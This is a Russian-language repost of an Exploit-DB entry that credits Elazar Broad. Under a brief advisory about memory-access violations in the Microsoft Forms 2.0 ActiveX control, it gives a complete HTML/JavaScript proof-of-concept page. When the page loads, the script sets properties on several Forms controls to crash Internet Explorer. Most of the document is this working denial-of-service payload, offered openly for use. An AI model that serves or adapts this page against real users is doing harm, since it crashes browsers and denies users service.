- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 30756
- Проверка EDB
-
- Пройдено
- Автор
- ELAZAR BROAD
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2007-11-12
HTML:
source: https://www.securityfocus.com/bid/26414/info
Microsoft Forms 2.0 ActiveX Control is prone to multiple memory-access violation denial-of-service vulnerabilities.
Attackers can exploit these issues to crash Internet Explorer and deny service to legitimate users.
Note: Forms 2.0 ActiveX is distributed with any application that includes Visual Basic for Applications 5.0.
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var obj;
//Forms.Checkbox.1
obj = new ActiveXObject("Forms.Checkbox.1");
obj.Caption = "A";
obj.GroupName = "A";
obj.Accelerator = "A";
//Forms.OptionButton.1
obj = new ActiveXObject("Forms.OptionButton.1");
obj.Caption = "A";
obj.GroupName = "A";
obj.Accelerator = "A";
//Forms.ToggleButton.1
obj = new ActiveXObject("Forms.ToggleButton.1");
obj.Caption = "A";
obj.GroupName = "A";
obj.Accelerator = "A";
//Forms.ComboBox.1
obj = new ActiveXObject("Forms.ComboBox.1");
obj.Text = "A";
obj.Value = "A";
//Forms.TextBox.1
obj = new ActiveXObject("Forms.Textbox.1");
obj.Text = "A";
obj.Value = "A";
obj.SelStart = 1;
}
</script>
</head>
<body onLoad="JavaScript: return Check();" />
</html>- Источник
- www.exploit-db.com
